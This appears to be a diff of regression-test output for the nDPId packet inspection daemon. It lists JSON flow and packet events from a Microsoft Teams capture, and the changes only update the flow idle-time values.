-00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676612,"flow_last_seen":1587041676643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041676643,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041677042,"flow_last_seen":1587041677042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041677042,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1587041677042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041677042,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex3AbvbPWM6AAAAALAC\/\/\/8iwAAAgQFtAEDAwUBAQgKMISaAAAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1587041677088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041677088,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8FwhAAGwGtHI0ck0hwKgBBgG77Hf6fNLR2z1jO6ASIACfvwAAAgQFoAEDAwgEAggKYRMfbzCEmgA="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1587041677088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041677088,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex3AbvbPWM7+nzS0oAQEAneQwAAAQEICjCEmixhEx9v"} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677042,"flow_last_seen":1587041677088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041677088,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01501{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":167,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041677042,"flow_last_seen":1587041677186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5981,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041677186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041677243,"flow_last_seen":1587041677243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041677243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1587041677243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041677243,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx4Abt\/TkvVAAAAALAC\/\/\/5uQAAAgQFtAEDAwUBAQgKMISawwAAAAAEAgAA"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1587041677255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041677255,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0wUlAAHUGi9Y0ccKEwKgBBgG77Hiki1UTf05L1oAS\/\/8DeQAAAgQFoAEDAwgBAQQC"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1587041677255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041677255,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx4Abt\/TkvWpItVFFAQIAAkOAAA"} -00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677243,"flow_last_seen":1587041677255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041677255,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01172{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041677243,"flow_last_seen":1587041677269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6239,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041677269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1587041677380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041677380,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGPCzAqAEGlZqnW+SlAbsZTPC8DAoX91AUECaMmwAA"} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676612,"flow_last_seen":1587041676612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676612,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1587041676612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676612,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4fAqAEGKH4JBex2AbukS07pAAAAALAC\/\/+ZfQAAAgQFtAEDAwUBAQgKMISYYwAAAAAEAgAA"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1587041676642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041676642,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8LqNAAG0G6+cofgkFwKgBBgG77HaiQxrbpEtO6qASIAC6gQAAAgQFoAEDAwgEAggKVQC94TCEmGM="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1587041676642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676642,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR5PAqAEGKH4JBex2AbukS07qokMa3IAQEAn5EwAAAQEICjCEmIFVAL3h"} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676612,"flow_last_seen":1587041676643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041676643,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041677042,"flow_last_seen":1587041677042,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041677042,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1587041677042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041677042,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex3AbvbPWM6AAAAALAC\/\/\/8iwAAAgQFtAEDAwUBAQgKMISaAAAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1587041677088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041677088,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8FwhAAGwGtHI0ck0hwKgBBgG77Hf6fNLR2z1jO6ASIACfvwAAAgQFoAEDAwgEAggKYRMfbzCEmgA="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1587041677088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041677088,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex3AbvbPWM7+nzS0oAQEAneQwAAAQEICjCEmixhEx9v"} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677042,"flow_last_seen":1587041677088,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041677088,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01501{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":167,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041677042,"flow_last_seen":1587041677186,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5981,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041677186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041677243,"flow_last_seen":1587041677243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041677243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1587041677243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041677243,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx4Abt\/TkvVAAAAALAC\/\/\/5uQAAAgQFtAEDAwUBAQgKMISawwAAAAAEAgAA"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1587041677255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041677255,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0wUlAAHUGi9Y0ccKEwKgBBgG77Hiki1UTf05L1oAS\/\/8DeQAAAgQFoAEDAwgBAQQC"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1587041677255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041677255,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx4Abt\/TkvWpItVFFAQIAAkOAAA"} +00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677243,"flow_last_seen":1587041677255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041677255,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01172{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041677243,"flow_last_seen":1587041677269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6239,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041677269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1587041677380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041677380,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGPCzAqAEGlZqnW+SlAbsZTPC8DAoX91AUECaMmwAA"} 00184{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":607,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041677408} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":607,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041677401,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00820{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1587041677422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1587041677422,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES5AAEARZ+PAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGADtdrMEAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} 00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":617,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041677611} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":617,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041677424,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041678029,"flow_last_seen":1587041678029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041678029,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1587041678029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041678029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex5Abv0H+uOAAAAALAC\/\/9XkAAAAgQFtAEDAwUBAQgKMISdwwAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041678074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8KlZAAGwGoSQ0ck0hwKgBBgG77Hk7ZXhQ9B\/rj6ASIAAz8QAAAgQFoAEDAwgEAggKYRL\/2zCEncM="} 